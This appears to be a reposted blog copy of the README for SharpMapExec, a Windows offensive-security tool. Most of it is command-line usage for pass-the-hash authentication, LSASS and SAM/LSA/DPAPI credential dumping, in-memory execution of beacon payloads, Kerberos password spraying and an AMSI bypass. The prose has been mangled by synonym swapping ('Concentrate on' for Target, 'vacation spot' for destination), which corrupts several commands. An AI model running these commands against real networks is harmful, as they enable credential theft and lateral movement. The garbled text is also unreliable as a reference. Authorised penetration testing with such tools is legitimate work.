SharpMapExec – A Sharpen Version Of CrackMapExec

SharpMapExec – A Sharpen Version Of CrackMapExec

A sharpen version of CrackMapExec. This resource is made to simplify penetration tests of networks and to produce a swiss army knife that is made for jogging on Windows which is typically a need throughout insider risk simulation engagements.

In addition to scanning for obtain it can be used to discover susceptible configurations and exfiltrate facts. The strategy for the facts exfiltration modules is to execute the the very least amount of necessary code on the distant laptop or computer. To carry out this, the instrument will download all the insider secrets to the loot listing and parse them regionally.

You can specify if you want to use Kerberos or NTLM authentication. If you choose Kerberos, the device will build a sacrificial token and use Rubeus to import/ask for the ticket. If NTLM is specified, it device will make threads and use SharpKatz to operate SetThreadToken if an NTLM hash is specified, and if a password is specified, it will go with standard c# impersonation.

SharpMapExec.exe
usage:

--- Smb ---
SharpMapExec.exe ntlm smb /user:Person /ntlm:HASH /area:Domain /computername:Concentrate on
SharpMapExec.exe kerberos smb /computername:Target

Offered Smb modules
/m:shares

--- WinRm ---
SharpMapExec.exe ntlm winrm /user:Person /password:PASSWORD /area:Domain /computername:Concentrate on
SharpMapExec.exe kerberos winrm /computername:Concentrate on

Available WinRm modules
/m:exec /a:whoami (Invoke-Command)
/m:exec /a:C:beacon.exe /method (Invoke-Command as Procedure)
/m:comsvcs (Dump Lsass Approach)
/m:secrets (Dump and Parse Sa m, Lsa, and Method Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute Area C# Assembly in memory)
/m:assembly /p:beacon.exe /system (Execute Nearby C# Assembly as Process in memory)
/m:down load /path:C:file /vacation spot:file (Down load File from Host)

--- Domain ---
SharpMapExec.exe kerbspray /customers:Buyers.TXT /passwords:PASSWORDS.TXT /area:Domain /dc:DC
SharpMapExec.exe tgtdeleg

Smb

Can be applied to scan for admin access and available Smb shares.

Modules

/m:shares                                  (Scan enumerated shares for accessibility)

WinRm

The beast. It has created-in Amsi bypass, JEA language breakout, JEA purpose analysis. Can be used for code execution, scaning for PsRemote entry, susceptible JEA endpoints, and facts exfiltration.

Modules

/m:exec /a:whoami                           (Invoke-Command)
/m:exec /a:C:beacon.exe /process (Invoke-Command as Method)
/m:comsvcs (Dump Lsass Approach)
/m:techniques (Dump and Parse Sam, Lsa, and Technique Dpapi blobs)
/m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
/m:assembly /p:beacon.exe /method (Execute Nearby C# Assembly as Program in memory)
/m:obtain /path:C:file /vacation spot:file (Down load File from Host)

Area

Presently supports domain password spraying and to produce a TGT for the recent consumer that can be used with the /ticket parameter to get the latest context.

Example usage

For quick or mass in-memory execution of C# assemblies

Kerberos password spraying then scanning for community admin access

 

This job supports scanning JEA endpoints and will evaluate resource code of non default commands and examine if the endpoint was not configured for no-language mode.

Find nearby admin password reuse with an NT hash.

 

Mass dump Lsass method with built-in Microsoft signed DLL and saves it to the loot folder

And much much more!

Some scenarios with Kerberos will have to have you to sync your clock with the DC and established the DNS

web time DC01.hackit.nearby /set
Get-NetAdapter ethernet0* | Established-DnsClientServerAddress -ServerAddresses @('192.168.1.10')

Acknowledgments

Projects that helped or are present in this device

IwawNZ1bDts

Image and Post Supply hyperlink

Examine A lot more on Pentesting Tools

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: